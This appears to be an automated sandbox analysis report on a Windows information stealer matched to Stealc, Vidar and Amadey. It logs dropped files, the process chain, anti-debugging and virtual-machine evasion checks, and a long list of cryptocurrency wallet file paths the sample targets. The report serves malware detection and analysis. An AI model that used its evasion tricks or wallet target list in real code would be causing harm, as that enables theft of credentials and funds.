Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1009141001\cc0a932c85.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 5756	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1432	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3084	Thread sleep time: -44022s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4196	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4196	Thread sleep time: -66033s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3192	Thread sleep time: -44022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092	Thread sleep count: 59 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092	Thread sleep time: -1770000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsDBKKKEHDHC.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA9EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CA9EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000020.00000002.3409584821.0000000000C60000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Web Data.8.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Web Data.8.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Web Data.8.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: Web Data.8.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Web Data.8.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2744608109.0000000023737000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: file.exe, 00000000.00000002.2720777420.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2720777420.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000020.00000002.3410736352.0000000001149000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000020.00000002.3410736352.0000000001118000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.8.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareWB*
Source: Web Data.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Web Data.8.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: Web Data.8.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000002.2744608109.0000000023737000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}bf
Source: Web Data.8.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Web Data.8.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Web Data.8.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Web Data.8.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Web Data.8.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Web Data.8.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Web Data.8.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Web Data.8.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Web Data.8.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Web Data.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Web Data.8.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Web Data.8.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Web Data.8.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Web Data.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2719679259.00000000004C5000.00000040.00000001.01000000.00000003.sdmp, DocumentsDBKKKEHDHC.exe, 0000001B.00000002.2714950235.0000000000C70000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000001C.00000002.2748588203.0000000000C60000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000020.00000002.3409584821.0000000000C60000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Web Data.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Code function: 27_2_04C20A25 Start: 04C20A5C End: 04C20A36		27_2_04C20A25
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_04EB0B03 Start: 04EB0C15 End: 04EB0B7D		32_2_04EB0B03

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsDBKKKEHDHC.exe

Code function: 27_2_04C20B4C rdtsc

27_2_04C20B4C

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CB6AC62

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00A9652B mov eax, dword ptr fs:[00000030h]		32_2_00A9652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00A9A302 mov eax, dword ptr fs:[00000030h]		32_2_00A9A302

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CB6AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4592, type: MEMORYSTR

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDBKKKEHDHC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsDBKKKEHDHC.exe "C:\Users\user\DocumentsDBKKKEHDHC.exe"
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBB4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6CBB4760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA91C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6CA91C30

Source: file.exe, file.exe, 00000000.00000002.2719679259.00000000004C5000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: tProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB6AE71 cpuid

0_2_6CB6AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB6A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CB6A8DC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 32_2_00A665E0 LookupAccountNameA,

32_2_00A665E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CAB8390 NSS_GetVersion,

0_2_6CAB8390

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 32.2.skotes.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.DocumentsDBKKKEHDHC.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.skotes.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000003.2708124358.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2672554775.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2714825632.0000000000A71000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3409408672.0000000000A61000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3282486940.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2748369916.0000000000A61000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2719068067.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2160777148.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4592, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4592, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
